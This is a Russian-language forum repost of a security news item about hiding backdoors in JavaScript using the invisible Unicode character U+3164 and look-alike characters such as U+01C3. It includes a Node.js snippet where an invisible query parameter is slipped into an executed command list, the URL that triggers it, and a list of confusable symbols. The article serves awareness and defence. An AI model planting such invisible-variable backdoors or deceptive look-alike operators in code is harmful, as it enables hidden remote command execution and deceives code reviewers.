Применение невидимых unicode-символов для скрытия действий в JavaScript-коде

Автор Сообщение
news_bot ®

Стаж: 6 лет 2 месяца
Сообщений: 27286

Создавать темы news_bot ® написал(а)
10-Ноя-2021 14:30

Следом за методом атаки Trojan Source, основанном на применении Unicode-символов, меняющих порядок отображения двунаправленного текста, опубликована ещё одна техника внедрения скрытых действий, применимая для кода на языке JavaScript. Новый метод базируется на применении unicode-символа "ㅤ" (код 0x3164, "HANGUL FILLER"), который относится к разряду букв, но не имеет видимого содержимого. Unicode-категория, в которую входит данный символ, разрешена начиная со спецификации
ECMAScript 2015 для использования в именах переменных JavaScript, что даёт возможность создавать невидимые переменные или новые переменные, не отличимые от других переменных в популярных редакторах кода, таких как Notepad++ и VS Code.
В качестве примера приводится код для платформы Node.js, в котором при помощи переменной, состоящей из одного символа "ㅤ", скрыт бэкдор, позволяющий выполнить указанный злоумышленником код:
app.get('/network_health', async (req, res) => {
       const { timeout,ㅤ} = req.query; // на деле указано "const { timeout,ㅤ \u3164}"
       const checkCommands = [
           'ping -c 1 google.com',
           'curl -s http://example.com/',ㅤ  // после запятой следует символ \u3164
       ];
На первый взгляд через внешний параметр передаётся только значение timeout, а массив с выполняемыми командами содержит безобидный фиксированный список. Но на деле после переменной timeout присваивается значение ещё одной невидимой переменной с кодом символа \u3164, которая также подставлена в массив исполняемых команд. Таким образом, при наличии подобной конструкции для активации бэкдора и выполнения своего кода атакующий может отправить запрос вида "https://host:8080/network_health?%E3%85%A4=команда".
В качестве ещё одного примера приводится символ "ǃ" (ALVEOLAR CLICK), который может использоваться для создания видимости указания восклицательного знака. Например, выражение "if(environmentǃ=ENV_PROD){" при выполнении в Node.js 14 всегда будет истинным, так как в нём осуществляется не проверка отличия, а присвоение переменной "environmentǃ" значения ENV_PROD. Среди вводящих в заблуждение unicode-символов, также отмечаются "/", "−", "+", "⩵", "❨", "⫽", "꓿" и "∗".
===========
Источник:
OpenNet.RU
===========

Похожие новости: Теги для поиска: #_unicode, #_javascript
Профиль  ЛС 
Показать сообщения:     

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы

Текущее время: 30-Апр 17:47
Часовой пояс: UTC + 5